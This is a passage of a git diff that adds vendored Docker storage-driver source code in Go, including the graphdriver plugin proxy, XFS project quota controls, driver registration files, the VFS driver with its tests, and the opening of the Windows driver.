+		b := time.Duration(retries) * backoff
+		time.Sleep(b)
+		totalBackoff += b
+
+		n, err := io.ReadFull(rand.Reader, u[count:])
+		if err != nil {
+			if retryOnError(err) && retries < maxretries {
+				count += n
+				retries++
+				logrus.Errorf("error generating version 4 uuid, retrying: %v", err)
+				continue
+			}
+
+			// Any other errors represent a system problem. What did someone
+			// do to /dev/urandom?
+			panic(fmt.Errorf("error reading random number generator, retried for %v: %v", totalBackoff.String(), err))
+		}
+
+		break
+	}
+
+	s := base32.StdEncoding.EncodeToString(u)
+
+	return s[:l]
+}
+
+// retryOnError tries to detect whether or not retrying would be fruitful.
+func retryOnError(err error) bool {
+	switch err := err.(type) {
+	case *os.PathError:
+		return retryOnError(err.Err) // unpack the target error
+	case syscall.Errno:
+		if err == syscall.EPERM {
+			// EPERM represents an entropy pool exhaustion, a condition under
+			// which we backoff and retry.
+			return true
+		}
+	}
+
+	return false
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go b/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go
new file mode 100644
index 0000000000..67c6640b4b
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/overlayutils/overlayutils.go
@@ -0,0 +1,18 @@
+// +build linux
+
+package overlayutils
+
+import (
+	"errors"
+	"fmt"
+)
+
+// ErrDTypeNotSupported denotes that the backing filesystem doesn't support d_type.
+func ErrDTypeNotSupported(driver, backingFs string) error {
+	msg := fmt.Sprintf("%s: the backing %s filesystem is formatted without d_type support, which leads to incorrect behavior.", driver, backingFs)
+	if backingFs == "xfs" {
+		msg += " Reformat the filesystem with ftype=1 to enable d_type support."
+	}
+	msg += " Running without d_type support will no longer be supported in Docker 1.16."
+	return errors.New(msg)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go b/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go
new file mode 100644
index 0000000000..7294bcc5f6
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/plugin.go
@@ -0,0 +1,43 @@
+package graphdriver
+
+import (
+	"fmt"
+	"io"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/plugingetter"
+	"github.com/docker/docker/plugin/v2"
+)
+
+type pluginClient interface {
+	// Call calls the specified method with the specified arguments for the plugin.
+	Call(string, interface{}, interface{}) error
+	// Stream calls the specified method with the specified arguments for the plugin and returns the response IO stream
+	Stream(string, interface{}) (io.ReadCloser, error)
+	// SendFile calls the specified method, and passes through the IO stream
+	SendFile(string, io.Reader, interface{}) error
+}
+
+func lookupPlugin(name string, pg plugingetter.PluginGetter, config Options) (Driver, error) {
+	if !config.ExperimentalEnabled {
+		return nil, fmt.Errorf("graphdriver plugins are only supported with experimental mode")
+	}
+	pl, err := pg.Get(name, "GraphDriver", plugingetter.ACQUIRE)
+	if err != nil {
+		return nil, fmt.Errorf("Error looking up graphdriver plugin %s: %v", name, err)
+	}
+	return newPluginDriver(name, pl, config)
+}
+
+func newPluginDriver(name string, pl plugingetter.CompatPlugin, config Options) (Driver, error) {
+	home := config.Root
+	if !pl.IsV1() {
+		if p, ok := pl.(*v2.Plugin); ok {
+			if p.PropagatedMount != "" {
+				home = p.PluginObj.Config.PropagatedMount
+			}
+		}
+	}
+	proxy := &graphDriverProxy{name, pl}
+	return proxy, proxy.Init(filepath.Join(home, name), config.DriverOptions, config.UIDMaps, config.GIDMaps)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go b/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go
new file mode 100644
index 0000000000..bfe74cc6f9
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/proxy.go
@@ -0,0 +1,252 @@
+package graphdriver
+
+import (
+	"errors"
+	"fmt"
+	"io"
+	"path/filepath"
+
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/plugingetter"
+)
+
+type graphDriverProxy struct {
+	name string
+	p    plugingetter.CompatPlugin
+}
+
+type graphDriverRequest struct {
+	ID         string            `json:",omitempty"`
+	Parent     string            `json:",omitempty"`
+	MountLabel string            `json:",omitempty"`
+	StorageOpt map[string]string `json:",omitempty"`
+}
+
+type graphDriverResponse struct {
+	Err      string            `json:",omitempty"`
+	Dir      string            `json:",omitempty"`
+	Exists   bool              `json:",omitempty"`
+	Status   [][2]string       `json:",omitempty"`
+	Changes  []archive.Change  `json:",omitempty"`
+	Size     int64             `json:",omitempty"`
+	Metadata map[string]string `json:",omitempty"`
+}
+
+type graphDriverInitRequest struct {
+	Home    string
+	Opts    []string        `json:"Opts"`
+	UIDMaps []idtools.IDMap `json:"UIDMaps"`
+	GIDMaps []idtools.IDMap `json:"GIDMaps"`
+}
+
+func (d *graphDriverProxy) Init(home string, opts []string, uidMaps, gidMaps []idtools.IDMap) error {
+	if !d.p.IsV1() {
+		if cp, ok := d.p.(plugingetter.CountedPlugin); ok {
+			// always acquire here, it will be cleaned up on daemon shutdown
+			cp.Acquire()
+		}
+	}
+	args := &graphDriverInitRequest{
+		Home:    home,
+		Opts:    opts,
+		UIDMaps: uidMaps,
+		GIDMaps: gidMaps,
+	}
+	var ret graphDriverResponse
+	if err := d.p.Client().Call("GraphDriver.Init", args, &ret); err != nil {
+		return err
+	}
+	if ret.Err != "" {
+		return errors.New(ret.Err)
+	}
+	return nil
+}
+
+func (d *graphDriverProxy) String() string {
+	return d.name
+}
+
+func (d *graphDriverProxy) CreateReadWrite(id, parent string, opts *CreateOpts) error {
+	args := &graphDriverRequest{
+		ID:     id,
+		Parent: parent,
+	}
+	if opts != nil {
+		args.MountLabel = opts.MountLabel
+		args.StorageOpt = opts.StorageOpt
+	}
+
+	var ret graphDriverResponse
+	if err := d.p.Client().Call("GraphDriver.CreateReadWrite", args, &ret); err != nil {
+		return err
+	}
+	if ret.Err != "" {
+		return errors.New(ret.Err)
+	}
+	return nil
+}
+
+func (d *graphDriverProxy) Create(id, parent string, opts *CreateOpts) error {
+	args := &graphDriverRequest{
+		ID:     id,
+		Parent: parent,
+	}
+	if opts != nil {
+		args.MountLabel = opts.MountLabel
+		args.StorageOpt = opts.StorageOpt
+	}
+	var ret graphDriverResponse
+	if err := d.p.Client().Call("GraphDriver.Create", args, &ret); err != nil {
+		return err
+	}
+	if ret.Err != "" {
+		return errors.New(ret.Err)
+	}
+	return nil
+}
+
+func (d *graphDriverProxy) Remove(id string) error {
+	args := &graphDriverRequest{ID: id}
+	var ret graphDriverResponse
+	if err := d.p.Client().Call("GraphDriver.Remove", args, &ret); err != nil {
+		return err
+	}
+	if ret.Err != "" {
+		return errors.New(ret.Err)
+	}
+	return nil
+}
+
+func (d *graphDriverProxy) Get(id, mountLabel string) (string, error) {
+	args := &graphDriverRequest{
+		ID:         id,
+		MountLabel: mountLabel,
+	}
+	var ret graphDriverResponse
+	if err := d.p.Client().Call("GraphDriver.Get", args, &ret); err != nil {
+		return "", err
+	}
+	var err error
+	if ret.Err != "" {
+		err = errors.New(ret.Err)
+	}
+	return filepath.Join(d.p.BasePath(), ret.Dir), err
+}
+
+func (d *graphDriverProxy) Put(id string) error {
+	args := &graphDriverRequest{ID: id}
+	var ret graphDriverResponse
+	if err := d.p.Client().Call("GraphDriver.Put", args, &ret); err != nil {
+		return err
+	}
+	if ret.Err != "" {
+		return errors.New(ret.Err)
+	}
+	return nil
+}
+
+func (d *graphDriverProxy) Exists(id string) bool {
+	args := &graphDriverRequest{ID: id}
+	var ret graphDriverResponse
+	if err := d.p.Client().Call("GraphDriver.Exists", args, &ret); err != nil {
+		return false
+	}
+	return ret.Exists
+}
+
+func (d *graphDriverProxy) Status() [][2]string {
+	args := &graphDriverRequest{}
+	var ret graphDriverResponse
+	if err := d.p.Client().Call("GraphDriver.Status", args, &ret); err != nil {
+		return nil
+	}
+	return ret.Status
+}
+
+func (d *graphDriverProxy) GetMetadata(id string) (map[string]string, error) {
+	args := &graphDriverRequest{
+		ID: id,
+	}
+	var ret graphDriverResponse
+	if err := d.p.Client().Call("GraphDriver.GetMetadata", args, &ret); err != nil {
+		return nil, err
+	}
+	if ret.Err != "" {
+		return nil, errors.New(ret.Err)
+	}
+	return ret.Metadata, nil
+}
+
+func (d *graphDriverProxy) Cleanup() error {
+	if !d.p.IsV1() {
+		if cp, ok := d.p.(plugingetter.CountedPlugin); ok {
+			// always release
+			defer cp.Release()
+		}
+	}
+
+	args := &graphDriverRequest{}
+	var ret graphDriverResponse
+	if err := d.p.Client().Call("GraphDriver.Cleanup", args, &ret); err != nil {
+		return nil
+	}
+	if ret.Err != "" {
+		return errors.New(ret.Err)
+	}
+	return nil
+}
+
+func (d *graphDriverProxy) Diff(id, parent string) (io.ReadCloser, error) {
+	args := &graphDriverRequest{
+		ID:     id,
+		Parent: parent,
+	}
+	body, err := d.p.Client().Stream("GraphDriver.Diff", args)
+	if err != nil {
+		return nil, err
+	}
+	return body, nil
+}
+
+func (d *graphDriverProxy) Changes(id, parent string) ([]archive.Change, error) {
+	args := &graphDriverRequest{
+		ID:     id,
+		Parent: parent,
+	}
+	var ret graphDriverResponse
+	if err := d.p.Client().Call("GraphDriver.Changes", args, &ret); err != nil {
+		return nil, err
+	}
+	if ret.Err != "" {
+		return nil, errors.New(ret.Err)
+	}
+
+	return ret.Changes, nil
+}
+
+func (d *graphDriverProxy) ApplyDiff(id, parent string, diff io.Reader) (int64, error) {
+	var ret graphDriverResponse
+	if err := d.p.Client().SendFile(fmt.Sprintf("GraphDriver.ApplyDiff?id=%s&parent=%s", id, parent), diff, &ret); err != nil {
+		return -1, err
+	}
+	if ret.Err != "" {
+		return -1, errors.New(ret.Err)
+	}
+	return ret.Size, nil
+}
+
+func (d *graphDriverProxy) DiffSize(id, parent string) (int64, error) {
+	args := &graphDriverRequest{
+		ID:     id,
+		Parent: parent,
+	}
+	var ret graphDriverResponse
+	if err := d.p.Client().Call("GraphDriver.DiffSize", args, &ret); err != nil {
+		return -1, err
+	}
+	if ret.Err != "" {
+		return -1, errors.New(ret.Err)
+	}
+	return ret.Size, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go
new file mode 100644
index 0000000000..e408d5f906
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/quota/projectquota.go
@@ -0,0 +1,339 @@
+// +build linux
+
+//
+// projectquota.go - implements XFS project quota controls
+// for setting quota limits on a newly created directory.
+// It currently supports the legacy XFS specific ioctls.
+//
+// TODO: use generic quota control ioctl FS_IOC_FS{GET,SET}XATTR
+//       for both xfs/ext4 for kernel version >= v4.5
+//
+
+package quota
+
+/*
+#include <stdlib.h>
+#include <dirent.h>
+#include <linux/fs.h>
+#include <linux/quota.h>
+#include <linux/dqblk_xfs.h>
+
+#ifndef FS_XFLAG_PROJINHERIT
+struct fsxattr {
+	__u32		fsx_xflags;
+	__u32		fsx_extsize;
+	__u32		fsx_nextents;
+	__u32		fsx_projid;
+	unsigned char	fsx_pad[12];
+};
+#define FS_XFLAG_PROJINHERIT	0x00000200
+#endif
+#ifndef FS_IOC_FSGETXATTR
+#define FS_IOC_FSGETXATTR		_IOR ('X', 31, struct fsxattr)
+#endif
+#ifndef FS_IOC_FSSETXATTR
+#define FS_IOC_FSSETXATTR		_IOW ('X', 32, struct fsxattr)
+#endif
+
+#ifndef PRJQUOTA
+#define PRJQUOTA	2
+#endif
+#ifndef XFS_PROJ_QUOTA
+#define XFS_PROJ_QUOTA	2
+#endif
+#ifndef Q_XSETPQLIM
+#define Q_XSETPQLIM QCMD(Q_XSETQLIM, PRJQUOTA)
+#endif
+#ifndef Q_XGETPQUOTA
+#define Q_XGETPQUOTA QCMD(Q_XGETQUOTA, PRJQUOTA)
+#endif
+*/
+import "C"
+import (
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path"
+	"path/filepath"
+	"syscall"
+	"unsafe"
+
+	"github.com/Sirupsen/logrus"
+)
+
+// Quota limit params - currently we only control blocks hard limit
+type Quota struct {
+	Size uint64
+}
+
+// Control - Context to be used by storage driver (e.g. overlay)
+// who wants to apply project quotas to container dirs
+type Control struct {
+	backingFsBlockDev string
+	nextProjectID     uint32
+	quotas            map[string]uint32
+}
+
+// NewControl - initialize project quota support.
+// Test to make sure that quota can be set on a test dir and find
+// the first project id to be used for the next container create.
+//
+// Returns nil (and error) if project quota is not supported.
+//
+// First get the project id of the home directory.
+// This test will fail if the backing fs is not xfs.
+//
+// xfs_quota tool can be used to assign a project id to the driver home directory, e.g.:
+//    echo 999:/var/lib/docker/overlay2 >> /etc/projects
+//    echo docker:999 >> /etc/projid
+//    xfs_quota -x -c 'project -s docker' /<xfs mount point>
+//
+// In that case, the home directory project id will be used as a "start offset"
+// and all containers will be assigned larger project ids (e.g. >= 1000).
+// This is a way to prevent xfs_quota management from conflicting with docker.
+//
+// Then try to create a test directory with the next project id and set a quota
+// on it. If that works, continue to scan existing containers to map allocated
+// project ids.
+//
+func NewControl(basePath string) (*Control, error) {
+	//
+	// Get project id of parent dir as minimal id to be used by driver
+	//
+	minProjectID, err := getProjectID(basePath)
+	if err != nil {
+		return nil, err
+	}
+	minProjectID++
+
+	//
+	// create backing filesystem device node
+	//
+	backingFsBlockDev, err := makeBackingFsDev(basePath)
+	if err != nil {
+		return nil, err
+	}
+
+	//
+	// Test if filesystem supports project quotas by trying to set
+	// a quota on the first available project id
+	//
+	quota := Quota{
+		Size: 0,
+	}
+	if err := setProjectQuota(backingFsBlockDev, minProjectID, quota); err != nil {
+		return nil, err
+	}
+
+	q := Control{
+		backingFsBlockDev: backingFsBlockDev,
+		nextProjectID:     minProjectID + 1,
+		quotas:            make(map[string]uint32),
+	}
+
+	//
+	// get first project id to be used for next container
+	//
+	err = q.findNextProjectID(basePath)
+	if err != nil {
+		return nil, err
+	}
+
+	logrus.Debugf("NewControl(%s): nextProjectID = %d", basePath, q.nextProjectID)
+	return &q, nil
+}
+
+// SetQuota - assign a unique project id to directory and set the quota limits
+// for that project id
+func (q *Control) SetQuota(targetPath string, quota Quota) error {
+
+	projectID, ok := q.quotas[targetPath]
+	if !ok {
+		projectID = q.nextProjectID
+
+		//
+		// assign project id to new container directory
+		//
+		err := setProjectID(targetPath, projectID)
+		if err != nil {
+			return err
+		}
+
+		q.quotas[targetPath] = projectID
+		q.nextProjectID++
+	}
+
+	//
+	// set the quota limit for the container's project id
+	//
+	logrus.Debugf("SetQuota(%s, %d): projectID=%d", targetPath, quota.Size, projectID)
+	return setProjectQuota(q.backingFsBlockDev, projectID, quota)
+}
+
+// setProjectQuota - set the quota for project id on xfs block device
+func setProjectQuota(backingFsBlockDev string, projectID uint32, quota Quota) error {
+	var d C.fs_disk_quota_t
+	d.d_version = C.FS_DQUOT_VERSION
+	d.d_id = C.__u32(projectID)
+	d.d_flags = C.XFS_PROJ_QUOTA
+
+	d.d_fieldmask = C.FS_DQ_BHARD | C.FS_DQ_BSOFT
+	d.d_blk_hardlimit = C.__u64(quota.Size / 512)
+	d.d_blk_softlimit = d.d_blk_hardlimit
+
+	var cs = C.CString(backingFsBlockDev)
+	defer C.free(unsafe.Pointer(cs))
+
+	_, _, errno := syscall.Syscall6(syscall.SYS_QUOTACTL, C.Q_XSETPQLIM,
+		uintptr(unsafe.Pointer(cs)), uintptr(d.d_id),
+		uintptr(unsafe.Pointer(&d)), 0, 0)
+	if errno != 0 {
+		return fmt.Errorf("Failed to set quota limit for projid %d on %s: %v",
+			projectID, backingFsBlockDev, errno.Error())
+	}
+
+	return nil
+}
+
+// GetQuota - get the quota limits of a directory that was configured with SetQuota
+func (q *Control) GetQuota(targetPath string, quota *Quota) error {
+
+	projectID, ok := q.quotas[targetPath]
+	if !ok {
+		return fmt.Errorf("quota not found for path : %s", targetPath)
+	}
+
+	//
+	// get the quota limit for the container's project id
+	//
+	var d C.fs_disk_quota_t
+
+	var cs = C.CString(q.backingFsBlockDev)
+	defer C.free(unsafe.Pointer(cs))
+
+	_, _, errno := syscall.Syscall6(syscall.SYS_QUOTACTL, C.Q_XGETPQUOTA,
+		uintptr(unsafe.Pointer(cs)), uintptr(C.__u32(projectID)),
+		uintptr(unsafe.Pointer(&d)), 0, 0)
+	if errno != 0 {
+		return fmt.Errorf("Failed to get quota limit for projid %d on %s: %v",
+			projectID, q.backingFsBlockDev, errno.Error())
+	}
+	quota.Size = uint64(d.d_blk_hardlimit) * 512
+
+	return nil
+}
+
+// getProjectID - get the project id of path on xfs
+func getProjectID(targetPath string) (uint32, error) {
+	dir, err := openDir(targetPath)
+	if err != nil {
+		return 0, err
+	}
+	defer closeDir(dir)
+
+	var fsx C.struct_fsxattr
+	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR,
+		uintptr(unsafe.Pointer(&fsx)))
+	if errno != 0 {
+		return 0, fmt.Errorf("Failed to get projid for %s: %v", targetPath, errno.Error())
+	}
+
+	return uint32(fsx.fsx_projid), nil
+}
+
+// setProjectID - set the project id of path on xfs
+func setProjectID(targetPath string, projectID uint32) error {
+	dir, err := openDir(targetPath)
+	if err != nil {
+		return err
+	}
+	defer closeDir(dir)
+
+	var fsx C.struct_fsxattr
+	_, _, errno := syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSGETXATTR,
+		uintptr(unsafe.Pointer(&fsx)))
+	if errno != 0 {
+		return fmt.Errorf("Failed to get projid for %s: %v", targetPath, errno.Error())
+	}
+	fsx.fsx_projid = C.__u32(projectID)
+	fsx.fsx_xflags |= C.FS_XFLAG_PROJINHERIT
+	_, _, errno = syscall.Syscall(syscall.SYS_IOCTL, getDirFd(dir), C.FS_IOC_FSSETXATTR,
+		uintptr(unsafe.Pointer(&fsx)))
+	if errno != 0 {
+		return fmt.Errorf("Failed to set projid for %s: %v", targetPath, errno.Error())
+	}
+
+	return nil
+}
+
+// findNextProjectID - find the next project id to be used for containers
+// by scanning driver home directory to find used project ids
+func (q *Control) findNextProjectID(home string) error {
+	files, err := ioutil.ReadDir(home)
+	if err != nil {
+		return fmt.Errorf("read directory failed : %s", home)
+	}
+	for _, file := range files {
+		if !file.IsDir() {
+			continue
+		}
+		path := filepath.Join(home, file.Name())
+		projid, err := getProjectID(path)
+		if err != nil {
+			return err
+		}
+		if projid > 0 {
+			q.quotas[path] = projid
+		}
+		if q.nextProjectID <= projid {
+			q.nextProjectID = projid + 1
+		}
+	}
+
+	return nil
+}
+
+func free(p *C.char) {
+	C.free(unsafe.Pointer(p))
+}
+
+func openDir(path string) (*C.DIR, error) {
+	Cpath := C.CString(path)
+	defer free(Cpath)
+
+	dir := C.opendir(Cpath)
+	if dir == nil {
+		return nil, fmt.Errorf("Can't open dir")
+	}
+	return dir, nil
+}
+
+func closeDir(dir *C.DIR) {
+	if dir != nil {
+		C.closedir(dir)
+	}
+}
+
+func getDirFd(dir *C.DIR) uintptr {
+	return uintptr(C.dirfd(dir))
+}
+
+// Get the backing block device of the driver home directory
+// and create a block device node under the home directory
+// to be used by quotactl commands
+func makeBackingFsDev(home string) (string, error) {
+	fileinfo, err := os.Stat(home)
+	if err != nil {
+		return "", err
+	}
+
+	backingFsBlockDev := path.Join(home, "backingFsBlockDev")
+	// Re-create just in case comeone copied the home directory over to a new device
+	syscall.Unlink(backingFsBlockDev)
+	stat := fileinfo.Sys().(*syscall.Stat_t)
+	if err := syscall.Mknod(backingFsBlockDev, syscall.S_IFBLK|0600, int(stat.Dev)); err != nil {
+		return "", fmt.Errorf("Failed to mknod %s: %v", backingFsBlockDev, err)
+	}
+
+	return backingFsBlockDev, nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go
new file mode 100644
index 0000000000..262954d6e3
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_aufs.go
@@ -0,0 +1,8 @@
+// +build !exclude_graphdriver_aufs,linux
+
+package register
+
+import (
+	// register the aufs graphdriver
+	_ "github.com/docker/docker/daemon/graphdriver/aufs"
+)
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go
new file mode 100644
index 0000000000..f456cc5ce5
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_btrfs.go
@@ -0,0 +1,8 @@
+// +build !exclude_graphdriver_btrfs,linux
+
+package register
+
+import (
+	// register the btrfs graphdriver
+	_ "github.com/docker/docker/daemon/graphdriver/btrfs"
+)
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go
new file mode 100644
index 0000000000..bb2e9ef541
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_devicemapper.go
@@ -0,0 +1,8 @@
+// +build !exclude_graphdriver_devicemapper,linux
+
+package register
+
+import (
+	// register the devmapper graphdriver
+	_ "github.com/docker/docker/daemon/graphdriver/devmapper"
+)
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go
new file mode 100644
index 0000000000..9ba849cedc
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_overlay.go
@@ -0,0 +1,9 @@
+// +build !exclude_graphdriver_overlay,linux
+
+package register
+
+import (
+	// register the overlay graphdriver
+	_ "github.com/docker/docker/daemon/graphdriver/overlay"
+	_ "github.com/docker/docker/daemon/graphdriver/overlay2"
+)
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go
new file mode 100644
index 0000000000..98fad23b20
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_vfs.go
@@ -0,0 +1,6 @@
+package register
+
+import (
+	// register vfs
+	_ "github.com/docker/docker/daemon/graphdriver/vfs"
+)
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go
new file mode 100644
index 0000000000..efaa5005ed
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_windows.go
@@ -0,0 +1,6 @@
+package register
+
+import (
+	// register the windows graph driver
+	_ "github.com/docker/docker/daemon/graphdriver/windows"
+)
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go
new file mode 100644
index 0000000000..8f34e35537
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/register/register_zfs.go
@@ -0,0 +1,8 @@
+// +build !exclude_graphdriver_zfs,linux !exclude_graphdriver_zfs,freebsd, solaris
+
+package register
+
+import (
+	// register the zfs driver
+	_ "github.com/docker/docker/daemon/graphdriver/zfs"
+)
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go
new file mode 100644
index 0000000000..8832d11531
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/driver.go
@@ -0,0 +1,145 @@
+package vfs
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/chrootarchive"
+	"github.com/docker/docker/pkg/idtools"
+
+	"github.com/opencontainers/runc/libcontainer/label"
+)
+
+var (
+	// CopyWithTar defines the copy method to use.
+	CopyWithTar = chrootarchive.CopyWithTar
+)
+
+func init() {
+	graphdriver.Register("vfs", Init)
+}
+
+// Init returns a new VFS driver.
+// This sets the home directory for the driver and returns NaiveDiffDriver.
+func Init(home string, options []string, uidMaps, gidMaps []idtools.IDMap) (graphdriver.Driver, error) {
+	d := &Driver{
+		home:    home,
+		uidMaps: uidMaps,
+		gidMaps: gidMaps,
+	}
+	rootUID, rootGID, err := idtools.GetRootUIDGID(uidMaps, gidMaps)
+	if err != nil {
+		return nil, err
+	}
+	if err := idtools.MkdirAllAs(home, 0700, rootUID, rootGID); err != nil {
+		return nil, err
+	}
+	return graphdriver.NewNaiveDiffDriver(d, uidMaps, gidMaps), nil
+}
+
+// Driver holds information about the driver, home directory of the driver.
+// Driver implements graphdriver.ProtoDriver. It uses only basic vfs operations.
+// In order to support layering, files are copied from the parent layer into the new layer. There is no copy-on-write support.
+// Driver must be wrapped in NaiveDiffDriver to be used as a graphdriver.Driver
+type Driver struct {
+	home    string
+	uidMaps []idtools.IDMap
+	gidMaps []idtools.IDMap
+}
+
+func (d *Driver) String() string {
+	return "vfs"
+}
+
+// Status is used for implementing the graphdriver.ProtoDriver interface. VFS does not currently have any status information.
+func (d *Driver) Status() [][2]string {
+	return nil
+}
+
+// GetMetadata is used for implementing the graphdriver.ProtoDriver interface. VFS does not currently have any meta data.
+func (d *Driver) GetMetadata(id string) (map[string]string, error) {
+	return nil, nil
+}
+
+// Cleanup is used to implement graphdriver.ProtoDriver. There is no cleanup required for this driver.
+func (d *Driver) Cleanup() error {
+	return nil
+}
+
+// CreateReadWrite creates a layer that is writable for use as a container
+// file system.
+func (d *Driver) CreateReadWrite(id, parent string, opts *graphdriver.CreateOpts) error {
+	return d.Create(id, parent, opts)
+}
+
+// Create prepares the filesystem for the VFS driver and copies the directory for the given id under the parent.
+func (d *Driver) Create(id, parent string, opts *graphdriver.CreateOpts) error {
+	if opts != nil && len(opts.StorageOpt) != 0 {
+		return fmt.Errorf("--storage-opt is not supported for vfs")
+	}
+
+	dir := d.dir(id)
+	rootUID, rootGID, err := idtools.GetRootUIDGID(d.uidMaps, d.gidMaps)
+	if err != nil {
+		return err
+	}
+	if err := idtools.MkdirAllAs(filepath.Dir(dir), 0700, rootUID, rootGID); err != nil {
+		return err
+	}
+	if err := idtools.MkdirAs(dir, 0755, rootUID, rootGID); err != nil {
+		return err
+	}
+	labelOpts := []string{"level:s0"}
+	if _, mountLabel, err := label.InitLabels(labelOpts); err == nil {
+		label.SetFileLabel(dir, mountLabel)
+	}
+	if parent == "" {
+		return nil
+	}
+	parentDir, err := d.Get(parent, "")
+	if err != nil {
+		return fmt.Errorf("%s: %s", parent, err)
+	}
+	if err := CopyWithTar(parentDir, dir); err != nil {
+		return err
+	}
+	return nil
+}
+
+func (d *Driver) dir(id string) string {
+	return filepath.Join(d.home, "dir", filepath.Base(id))
+}
+
+// Remove deletes the content from the directory for a given id.
+func (d *Driver) Remove(id string) error {
+	if err := os.RemoveAll(d.dir(id)); err != nil && !os.IsNotExist(err) {
+		return err
+	}
+	return nil
+}
+
+// Get returns the directory for the given id.
+func (d *Driver) Get(id, mountLabel string) (string, error) {
+	dir := d.dir(id)
+	if st, err := os.Stat(dir); err != nil {
+		return "", err
+	} else if !st.IsDir() {
+		return "", fmt.Errorf("%s: not a directory", dir)
+	}
+	return dir, nil
+}
+
+// Put is a noop for vfs that return nil for the error, since this driver has no runtime resources to clean up.
+func (d *Driver) Put(id string) error {
+	// The vfs driver has no runtime resources (e.g. mounts)
+	// to clean up, so we don't need anything here
+	return nil
+}
+
+// Exists checks to see if the directory exists for the given id.
+func (d *Driver) Exists(id string) bool {
+	_, err := os.Stat(d.dir(id))
+	return err == nil
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go
new file mode 100644
index 0000000000..9ecf21dbaa
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/vfs/vfs_test.go
@@ -0,0 +1,37 @@
+// +build linux
+
+package vfs
+
+import (
+	"testing"
+
+	"github.com/docker/docker/daemon/graphdriver/graphtest"
+
+	"github.com/docker/docker/pkg/reexec"
+)
+
+func init() {
+	reexec.Init()
+}
+
+// This avoids creating a new driver for each test if all tests are run
+// Make sure to put new tests between TestVfsSetup and TestVfsTeardown
+func TestVfsSetup(t *testing.T) {
+	graphtest.GetDriver(t, "vfs")
+}
+
+func TestVfsCreateEmpty(t *testing.T) {
+	graphtest.DriverTestCreateEmpty(t, "vfs")
+}
+
+func TestVfsCreateBase(t *testing.T) {
+	graphtest.DriverTestCreateBase(t, "vfs")
+}
+
+func TestVfsCreateSnap(t *testing.T) {
+	graphtest.DriverTestCreateSnap(t, "vfs")
+}
+
+func TestVfsTeardown(t *testing.T) {
+	graphtest.PutDriver(t)
+}
diff --git a/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go b/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go
new file mode 100644
index 0000000000..beac93ae75
--- /dev/null
+++ b/vendor/github.com/docker/docker/daemon/graphdriver/windows/windows.go
@@ -0,0 +1,886 @@
+//+build windows
+
+package windows
+
+import (
+	"bufio"
+	"bytes"
+	"encoding/json"
+	"errors"
+	"fmt"
+	"io"
+	"io/ioutil"
+	"os"
+	"path"
+	"path/filepath"
+	"strconv"
+	"strings"
+	"sync"
+	"syscall"
+	"time"
+	"unsafe"
+
+	"github.com/Microsoft/go-winio"
+	"github.com/Microsoft/go-winio/archive/tar"
+	"github.com/Microsoft/go-winio/backuptar"
+	"github.com/Microsoft/hcsshim"
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/daemon/graphdriver"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/ioutils"
+	"github.com/docker/docker/pkg/longpath"
+	"github.com/docker/docker/pkg/reexec"
+	units "github.com/docker/go-units"
